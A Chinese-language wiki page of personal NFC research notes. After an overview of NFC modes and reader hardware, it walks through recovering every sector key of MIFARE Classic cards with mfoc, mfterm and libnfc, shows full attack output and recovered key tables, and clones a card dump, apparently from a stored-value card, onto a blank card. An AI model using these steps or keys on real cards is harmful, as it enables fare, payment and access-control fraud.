NFC Research

来自Jack's Lab
跳转到: 导航, 搜索

目录

1 概述

NFC 即 Near Field Communication,即近距离无线通讯技术。允许电子设备之间进行非接触式点对点数据传输,在十厘米(3.9英吋)内交换数据。

这个技术由 RFID 演变而来,由飞利浦半导体(现恩智浦半导体,NXP)、诺基亚和索尼共同研制开发,其基础是 RFID 及互连技术。

近场通信是一种短距高频的无线电技术,在13.56MHz频率运行于20厘米距离内。其传输速度有 106 Kbit/s、212 Kbit/s 或者 424 Kbit/s 三种。

目前近场通信已通过成为ISO/IEC IS 18092国际标准、EMCA-340标准与ETSI TS 102 190标准


NFC 向下兼容 RFID,其将非接触读卡器、非接触卡和点对点功能整合进一块单芯片,通俗的说 NFC 就是 RFID 的演进版本



2 设备

  • ACS 122U
使用广泛的 NFC 读卡器(USB 接口)


  • 带 NFC 的手机
魅族 MX3
Oppop Find 5
小米2A,小米3
SONY Xperia V LT25i
Samsung Galaxy Note 3、Galaxy Note 2、Galaxy Note、Galaxy S2、Galaxy S3、Galaxy S4
Nokia Lumia720、Lumia 820、Lumia 920 以及 Lumia925、Lumia928 和 Lumia1020


  • proxmark3
http://proxmark3.com/



3 工作模式

卡模式(Card emulation):这个模式其实就是相当于一张采用 RFID 技术的IC卡。可以替代现在大量的IC卡(包括信用卡)场合商场刷卡、悠游卡、门禁管制,车票,门票等等。此种方式下,有一个极大的优点,那就是卡片通过非接触读卡器的 RF 域来供电,即便是寄主设备(如手机)没电也可以工作


点对点模式(P2P mode):这个模式和红外线差不多,可用于数据交换,只是传输距离较短,传输创建速度较快,传输速度也快些,功耗低(蓝牙也类似)。将两个具备NFC功能的设备链接,能实现数据点对点传输,如下载音乐、交换图片或者同步设备地址薄


读卡器模式(Reader/writer mode):作为非接触式读卡器使用,比如读取市政交通一卡通的余额和交易记录,从海报或者展览信息电子标签上读取相关信息等



4 解码

Mifare 1 S50 (1K EEPROM) 和 Mifare 1 S70 (4K EEPROM) 早以被全面爆破,现在最新的应用都是 Mifare DESFire


硬件: ACR 122U,人民币 200 左右

软件: 开源工具

扫 keys: mfoc http://code.google.com/p/mfoc/
爆破一个区的 key: mfcuk http://code.google.com/p/mfcuk/
Mifare Classic Card 辅助工具: mfterm https://github.com/4ZM/mfterm
核心支持库: libnfc http://code.google.com/p/libnfc/


1. 编译

$ wget http://libnfc.googlecode.com/files/libnfc-1.7.0.tar.bz2
$ tar jxf libnfc-1.7.0.tar.bz2
$ cd libnfc-1.7.0
$ ./configure              # 默认使用的 ACR122U 的 driver 是 acr122_usb,直接USB通讯而不是通过 acr122_pcsc 这个driver 去通过中间件 PCSC 支持读卡器 
$ make
$ sudo make install

$ wget http://mfoc.googlecode.com/files/mfoc-0.10.6.tar.gz && tar -xvzf mfoc-0.10.6.tar.gz
$ cd mfoc-0.10.6
$ ./configure
$ make
$ sudo make install

$ git clone git://github.com/4ZM/mfterm
$ cd mfterm
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

mfcuk 同理,编译过程中缺库,补上即可


2. 扫 key


确认系统发现 ACR122U:

$ nfc-list
nfc-list uses libnfc libnfc-1.7.0-40-g7e5257d
error	libnfc.driver.acr122_usb	Unable to claim USB interface (Operation not permitted)
nfc-list: ERROR: Unable to open NFC device: acr122_usb:001:009

$ sudo nfc-list
nfc-list uses libnfc libnfc-1.7.0-40-g7e5257d
NFC device: ACS / ACR122U PICC Interface opened

在 vmware 虚拟机上没法工作,老出现 Unable to write USB interface 错误


开始扫所有 Sector 的 key:

$ sudo mfoc -P 500 -O dump.card.file
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  02  
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): 25  55  aa  10  
      SAK (SEL_RES): 18  
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 4K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 4K, Security level 1
* SmartMX with MIFARE 4K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [........................................]
[Key: a0a1a2a3a4a5] -> [/.......................................]
[Key: d3f7d3f7d3f7] -> [/.......................................]
[Key: 000000000000] -> [/.......................................]
[Key: b0b1b2b3b4b5] -> [/.......................................]
[Key: 4d3a99c351dd] -> [/.......................................]
[Key: 1a982c7e459a] -> [/.......................................]
[Key: aabbccddeeff] -> [/.......................................]
[Key: 714c5c886e97] -> [/.......................................]
[Key: 587ee5f9350f] -> [/.......................................]
[Key: a0478cc39091] -> [/.......................................]
[Key: 533cb6c723f6] -> [/.......................................]
[Key: 8fd0a4f256e9] -> [/.......................................]

Sector 00 -  FOUND_KEY   [A]  Sector 00 -  UNKNOWN_KEY [B]  
Sector 01 -  UNKNOWN_KEY [A]  Sector 01 -  UNKNOWN_KEY [B]  
Sector 02 -  UNKNOWN_KEY [A]  Sector 02 -  UNKNOWN_KEY [B]  
Sector 03 -  UNKNOWN_KEY [A]  Sector 03 -  UNKNOWN_KEY [B]  
Sector 04 -  UNKNOWN_KEY [A]  Sector 04 -  UNKNOWN_KEY [B]  
Sector 05 -  UNKNOWN_KEY [A]  Sector 05 -  UNKNOWN_KEY [B]  
Sector 06 -  UNKNOWN_KEY [A]  Sector 06 -  UNKNOWN_KEY [B]  
Sector 07 -  UNKNOWN_KEY [A]  Sector 07 -  UNKNOWN_KEY [B]  
Sector 08 -  UNKNOWN_KEY [A]  Sector 08 -  UNKNOWN_KEY [B]  
Sector 09 -  UNKNOWN_KEY [A]  Sector 09 -  UNKNOWN_KEY [B]  
Sector 10 -  UNKNOWN_KEY [A]  Sector 10 -  UNKNOWN_KEY [B]  
Sector 11 -  UNKNOWN_KEY [A]  Sector 11 -  UNKNOWN_KEY [B]  
Sector 12 -  UNKNOWN_KEY [A]  Sector 12 -  UNKNOWN_KEY [B]  
Sector 13 -  UNKNOWN_KEY [A]  Sector 13 -  UNKNOWN_KEY [B]  
Sector 14 -  UNKNOWN_KEY [A]  Sector 14 -  UNKNOWN_KEY [B]  
Sector 15 -  UNKNOWN_KEY [A]  Sector 15 -  UNKNOWN_KEY [B]  
Sector 16 -  UNKNOWN_KEY [A]  Sector 16 -  UNKNOWN_KEY [B]  
Sector 17 -  UNKNOWN_KEY [A]  Sector 17 -  UNKNOWN_KEY [B]  
Sector 18 -  UNKNOWN_KEY [A]  Sector 18 -  UNKNOWN_KEY [B]  
Sector 19 -  UNKNOWN_KEY [A]  Sector 19 -  UNKNOWN_KEY [B]  
Sector 20 -  UNKNOWN_KEY [A]  Sector 20 -  UNKNOWN_KEY [B]  
Sector 21 -  UNKNOWN_KEY [A]  Sector 21 -  UNKNOWN_KEY [B]  
Sector 22 -  UNKNOWN_KEY [A]  Sector 22 -  UNKNOWN_KEY [B]  
Sector 23 -  UNKNOWN_KEY [A]  Sector 23 -  UNKNOWN_KEY [B]  
Sector 24 -  UNKNOWN_KEY [A]  Sector 24 -  UNKNOWN_KEY [B]  
Sector 25 -  UNKNOWN_KEY [A]  Sector 25 -  UNKNOWN_KEY [B]  
Sector 26 -  UNKNOWN_KEY [A]  Sector 26 -  UNKNOWN_KEY [B]  
Sector 27 -  UNKNOWN_KEY [A]  Sector 27 -  UNKNOWN_KEY [B]  
Sector 28 -  UNKNOWN_KEY [A]  Sector 28 -  UNKNOWN_KEY [B]  
Sector 29 -  UNKNOWN_KEY [A]  Sector 29 -  UNKNOWN_KEY [B]  
Sector 30 -  UNKNOWN_KEY [A]  Sector 30 -  UNKNOWN_KEY [B]  
Sector 31 -  UNKNOWN_KEY [A]  Sector 31 -  UNKNOWN_KEY [B]  
Sector 32 -  UNKNOWN_KEY [A]  Sector 32 -  UNKNOWN_KEY [B]  
Sector 33 -  UNKNOWN_KEY [A]  Sector 33 -  UNKNOWN_KEY [B]  
Sector 34 -  UNKNOWN_KEY [A]  Sector 34 -  UNKNOWN_KEY [B]  
Sector 35 -  UNKNOWN_KEY [A]  Sector 35 -  UNKNOWN_KEY [B]  
Sector 36 -  UNKNOWN_KEY [A]  Sector 36 -  UNKNOWN_KEY [B]  
Sector 37 -  UNKNOWN_KEY [A]  Sector 37 -  UNKNOWN_KEY [B]  
Sector 38 -  UNKNOWN_KEY [A]  Sector 38 -  UNKNOWN_KEY [B]  
Sector 39 -  UNKNOWN_KEY [A]  Sector 39 -  UNKNOWN_KEY [B]  


Using sector 00 as an exploit sector
Sector: 1, type A, probe 0, distance 15105 .....
Sector: 1, type A, probe 1, distance 15147 .....
Found Key: A [2c5a3710d3a5]
Sector: 2, type A, probe 0, distance 15147 .....
Found Key: A [c3a4fa8db109]
Sector: 3, type A, probe 0, distance 15147 .....
Found Key: A [3c34515b11d4]
Sector: 4, type A, probe 0, distance 15149 .....
Found Key: A [0725a08f31e6]
Sector: 5, type A, probe 0, distance 15151 .....
Found Key: A [5601f83644bb]
Sector: 6, type A, probe 0, distance 15149 .....
Sector: 6, type A, probe 1, distance 15149 .....
Sector: 6, type A, probe 2, distance 15149 .....
Found Key: A [20f2bf55ac1a]
Sector: 7, type A, probe 0, distance 15147 .....
Found Key: A [dd77fb8c3736]
Sector: 8, type A, probe 0, distance 15149 .....
Sector: 8, type A, probe 1, distance 15147 .....
Found Key: A [c2180972c580]
Sector: 9, type A, probe 0, distance 15151 .....
Found Key: A [742c582e8c04]
Sector: 10, type A, probe 0, distance 15151 .....
Sector: 10, type A, probe 1, distance 15193 .....
Sector: 10, type A, probe 2, distance 15151 .....
Found Key: A [db338f92bb98]
Sector: 11, type A, probe 0, distance 15151 .....
Found Key: A [15559907e873]
Sector: 12, type A, probe 0, distance 15151 .....
Found Key: A [c8313c454d2a]
Sector: 13, type A, probe 0, distance 15149 .....
Sector: 13, type A, probe 1, distance 15149 .....
Found Key: A [c896c22e5b3e]
Sector: 14, type A, probe 0, distance 15149 .....
Found Key: A [72558e3fe66c]
Sector: 15, type A, probe 0, distance 15151 .....
Found Key: A [aec383ce3c12]
......
......

完成后会把整个数据写入 dump.card.file 这个文件


3. 再读

扫描到所有区的 key 后,再读的话,可以在 mfterm 中直接加载 dump.card.file 这个文件,mfterm 会自动取出所有 key,再行读写就快很多

带 NFC 功能的手机,可以使用 MifareClassicTool 这个工具,移动读写,方便很多

comcat@jackslab:~$ mfterm
$ read
No key argument (A|B) given. Defaulting to A
error	libnfc.driver.acr122_usb	Unable to claim USB interface (Operation not permitted)
Could not connect to any NFC device

comcat@jackslab:~$ sudo mfterm
$ help
    quit               Exit the program.
    load               Load tag data from a file.
    save               Save tag data to a file.
    clear              Clear the current tag data.
    read               A|B : Read tag data from a physical tag.
    read unlocked      On pirate cards, read card without keys.
    write              A|B : Write tag data to a physical tag.
    write unlocked     On pirate cards, write 1k tag with block 0.
    print              1k|4k : Print tag data.
    print keys         1k|4k : Print tag's keys.
    print ac           Print access conditions.
    set                #block #offset = xx xx xx : Set tag data.
    keys load          Load keys from a file.
    keys save          Save keys to a file.
    keys clear         Clear the keys.
    keys set           A|B #S key : Set a key value.
    keys import        Import keys from the current tag.
    keys test          Try to authenticate with the keys.
    keys               1k|4k : Print the keys.
    dict load          Load a dictionary key file.
    dict clear         Clear the key dictionary.
    dict attack        Find keys of a physical tag.
    dict               Print the key dictionary.
    spec load          Load a specification file.
    spec clear         Unload the specification.
    spec               Print the specification.
    mac key            <k0..k7> : Get or set MAC key.
    mac compute        #block : Compute block MAC.
    mac update         #block : Compute block MAC.
    mac validate       1k|4k : Validates block MAC of the whole tag.
$ read
No key argument (A|B) given. Defaulting to A
Connected to device, but no tag found.

$ keys load dump.card.file   # 直接解析 dump 出的整个卡数据,加载 keys
Successfully loaded keys from: dump.card.file

$ keys 
xS  xB  KeyA          KeyB
----------------------------------
00  03  c0c1c2c3c4c5  a1475c9ee325
01  07  2c5c3710d3c5  b40b2c0d47f1
02  0b  c1f4ff83b109  dc0fc2d4d8cc
03  0f  3c34515b11d4  b42fc69d3ccf
04  13  0725c08f31e6  f8cf2c85e843
05  17  5601f83644bb  c9398274cc1d
06  1b  20f2bf55cc1c  8f5cd31b4f53
07  1f  dd77fb8c3736  e95fc402e7b6
08  23  c2180972c580  d43ec542967d
09  27  742c582e8c04  d43ec542967d
0a  2b  db338f92bb98  e92d77b9c1f2
0b  2f  15559907e873  4f94956dfce7
0c  33  c8313c454d2c  25860937cf4d
0d  37  c896c22e5b3e  717b5b4b67d2
0e  3b  72558e3fe66c  cded278592c2
0f  3f  cec383ce3c12  f1475c9ee325

$ keys test 4k A	     # key 验证

$ keys save /tmp/a
Successfully wrote keys to: /tmp/a

$ keys load /tmp/a
Successfully loaded keys from: /tmp/a

$ read			     # 读取卡上所有数据
No key argument (A|B) given. Defaulting to A
Reading: [.........0x13.0x12.0x11.0x10................] Auth errors in indicated sectors.
Read MIFARE Classic 4k (SAK: 18, ATQA: 00 02)

$ quit
comcat@jackslab:~$



5 写入

# mfoc -P 500 -O blank.card.orig.dump
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04  
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): f5  15  e9  c4  
      SAK (SEL_RES): 08  
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
......
...... 

Sector 00 -  FOUND_KEY   [A]  Sector 00 -  FOUND_KEY   [B]  
Sector 01 -  FOUND_KEY   [A]  Sector 01 -  FOUND_KEY   [B]  
Sector 02 -  FOUND_KEY   [A]  Sector 02 -  FOUND_KEY   [B]  
......
...... 

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00  00  00  00  00  00  ff  07  80  69  ff  ff  ff  ff  ff  ff  
Block 62, type A, key ffffffffffff :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
......
...... 


# nfc-mfclassic W a ykt20.dump blank.card.orig.dump f
NFC reader: ACS / ACR122U PICC Interface opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04  
       UID (NFCID1): f5  15  e9  c4  
      SAK (SEL_RES): 08  
Guessing size: seems to be a 1024-byte card
Sent bits:     50  00  57  cd  
Sent bits:     40 (7 bits)
unlock failure!

# nfc-mfclassic w a ykt20.dump blank.card.orig.dump 
NFC reader: ACS / ACR122U PICC Interface opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04  
       UID (NFCID1): f5  15  e9  c4  
      SAK (SEL_RES): 08  
Guessing size: seems to be a 1024-byte card
Writing 64 blocks |...............................................................|
Done, 63 of 64 blocks written.

# mfoc -P 500 -O dump.card.file
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04  
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): f5  15  e9  c4  
      SAK (SEL_RES): 08  
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [................]
[Key: a0a1a2a3a4a5] -> [/...............]
[Key: d3f7d3f7d3f7] -> [/...............]
[Key: 000000000000] -> [/...............]
......
......

Sector 00 -  FOUND_KEY   [A]  Sector 00 -  UNKNOWN_KEY [B]  
Sector 01 -  UNKNOWN_KEY [A]  Sector 01 -  UNKNOWN_KEY [B]  
Sector 02 -  UNKNOWN_KEY [A]  Sector 02 -  UNKNOWN_KEY [B]  
......
......


Using sector 00 as an exploit sector
Sector: 1, type A, probe 0, distance 32 .....
Sector: 1, type A, probe 1, distance 32 .....
Found Key: A [2c5a3710d3a5]
Sector: 2, type A, probe 0, distance 32 .....
Sector: 2, type A, probe 1, distance 32 .....
Found Key: A [c1f4ff83b109]
Sector: 3, type A, probe 0, distance 32 .....
Sector: 3, type A, probe 1, distance 32 .....
Found Key: A [3c34515b11d4]
Sector: 4, type A, probe 0, distance 32 .....
Found Key: A [0725a08f31e6]
Sector: 5, type A, probe 0, distance 32 .....
Found Key: A [5601f83644bb]
......
......
Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key aec383ce3c12 :00  00  00  00  00  00  7f  07  88  00  00  00  00  00  00  00  
Block 62, type A, key aec383ce3c12 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 61, type A, key aec383ce3c12 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
......
......

# mfterm
$ keys load dump.card.file 
Successfully loaded keys from: dump.card.file
$ keys
xS  xB  KeyA          KeyB
----------------------------------
00  03  a0a1a2a3a4a5  f1475c9ee325
01  07  2c5a3710d3a5  840b2a0d47f1
02  0b  c1f4ff83b109  dc0fa2d4d8aa
03  0f  3c34515b11d4  b42fa69d3acf
04  13  0725a08f31e6  f8cf2c85e843
05  17  5601f83644bb  c9398274ca1d
06  1b  20f2bf55ac1a  8f5ad31b4f53
07  1f  dd77fb8c3736  e95fc402e7b6
08  23  c2180972c580  d43ea542967d
09  27  742c582e8c04  d43ea542967d
0a  2b  db338f92bb98  e92d77b9a1f2
0b  2f  15559907e873  4f94956dfae7
0c  33  c8313c454d2a  25860937af4d
0d  37  c896c22e5b3e  717b5b4b67d2
0e  3b  72558e3fe66c  aded278592c2
0f  3f  aec383ce3c12  f1475c9ee325

$ keys load ykt20.dump 
Successfully loaded keys from: ykt20.dump
$ keys 
xS  xB  KeyA          KeyB
----------------------------------
00  03  a0a1a2a3a4a5  f1475c9ee325
01  07  2c5a3710d3a5  840b2a0d47f1
02  0b  c1f4ff83b109  dc0fa2d4d8aa
03  0f  3c34515b11d4  b42fa69d3acf
04  13  0725a08f31e6  f8cf2c85e843
05  17  5601f83644bb  c9398274ca1d
06  1b  20f2bf55ac1a  8f5ad31b4f53
07  1f  dd77fb8c3736  e95fc402e7b6
08  23  c2180972c580  d43ea542967d
09  27  742c582e8c04  d43ea542967d
0a  2b  db338f92bb98  e92d77b9a1f2
0b  2f  15559907e873  4f94956dfae7
0c  33  c8313c454d2a  25860937af4d
0d  37  c896c22e5b3e  717b5b4b67d2
0e  3b  72558e3fe66c  aded278592c2
0f  3f  aec383ce3c12  f1475c9ee325
$ read
No key argument (A|B) given. Defaulting to A
Reading: [................] Success!
Read MIFARE Classic 1k (SAK: 08, ATQA: 00 04)



























个人工具
名字空间

变换
操作
导航
工具箱